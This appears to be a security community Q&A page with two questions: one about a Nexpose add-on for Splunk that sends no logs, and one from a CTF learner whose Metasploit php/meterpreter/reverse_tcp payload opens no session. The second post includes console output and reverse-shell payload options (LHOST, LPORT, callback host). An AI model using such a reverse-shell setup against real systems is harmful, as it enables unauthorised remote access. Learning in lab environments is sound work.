Knowledge Base

Ask A Question

Questions

0

Rapid7 Nexpose TA Add-on for Splunk not working.

Hi, I'm trying to integrate splunk with Nexpose using the TA Add-on but is not sending the logs, I have already set up everything as described but still does not work. I have the data input added on the forwarder and the account set up. these are the logs that I get from the TA-Rapid7_nexpose.log 2018-09-10 14:48:57,905 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 14:48:58,005 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 14:48:58,006 INFO nx_logger:38 - Listing the fields for the set up screen... 2018-09-10 14:48:58,198 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 14:48:58,307 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:33,181 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:33,311 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:33,311 INFO nx_logger:38 - Listing the fields for the set up screen... 2018-09-10 15:02:33,511 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:33,609 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:33,725 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:33,836 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:33,837 INFO nx_logger:38 - Listing the fields for the set up screen... 2018-09-10 15:02:34,036 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:34,138 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:34,249 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:34,355 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:34,356 INFO nx_logger:38 - Listing the fields for the set up screen... 2018-09-10 15:02:34,543 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:34,643 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:34,743 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:34,841 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:34,841 INFO nx_logger:38 - Saving changes made on configuration screen... 2018-09-10 15:02:34,937 INFO nx_logger:38 - Sucessfully retrieved stored config for Nexpose. 2018-09-10 15:02:34,953 INFO nx_logger:38 - Password retrieved. 2018-09-10 15:02:35,110 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:35,111 INFO nx_logger:38 - Listing the fields for the set up screen... 2018-09-10 15:02:35,300 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:35,428 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:35,429 INFO nx_logger:38 - Listing the fields for the set up screen... 2018-09-10 15:02:35,622 INFO nx_logger:38 - Executing nexpose_setup.py 2018-09-10 15:02:35,726 INFO nx_logger:38 - Executing nexpose_setup.py I would like to see if I there is way to see more logs and troubleshoot this, Thanks. Ernesto M.

Posted by Ernesto Melendez 3 months ago

0

Can't open a Meterpreter Session by using a php/meterpreter/reverse_tcp payload

Hi, I'm learning to use Metasploit on a publicly accessible over openvpn CTF machine. I cannot get reverse shell using Metasploit, where I’m very confident that should work - people in forum confirm this. I’m running kali VirtualBox VM on Windows 7 host on laptop. I can ping and turned off windows firewall. I also tried to install everything fresh on desktop PC on Windows 10 with fresh kali VM. Did you experience similar problems or do you have any hint for me? My ifconfig: eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.x.x.x netmask 255.255.255.0 ... lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 ... tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500 inet 10.y.y.y netmask 255.255.254.0 destination 10.y.y.y ... I know from forum I should user tun0 IP. Only one time I had meterpreter session. It was timed out. But now I can not get new session, despite all parameters are the same. I use tun interface. What could be a problem in your opinion? I tried to exploit multiple times. I did set TARGET and set PAYLOAD and set LHOST again. I reseted target machine multiple times, but no luck – no session. But the same worked - only once. I cannot understand this. Current status: msf exploit(exploit) > exploit [] Started reverse TCP handler on 10.y.y.y:4444 [] Exploit completed, but no session was created. msf exploit(exploit) > show options Module options (exploit): Name Current Setting Required Description ---- --------------- -------- ----------- PATH / yes Path to target webapp Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST targetIP yes The target address RPORT 80 yes The target port (TCP) SRVHOST 10.y.y.y yes Callback host for accepting connections SRVPORT 9000 yes Port to listen for the debugger SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.y.y.y yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name 0 Automatic There must be something else to setup. E.g. there is a remark for LHOST “an interface may be specified”. Should I make: “setg interface tun0”? Or should I somehow clean up my Metasploit? Thanks

Posted by Roman Graf 3 months ago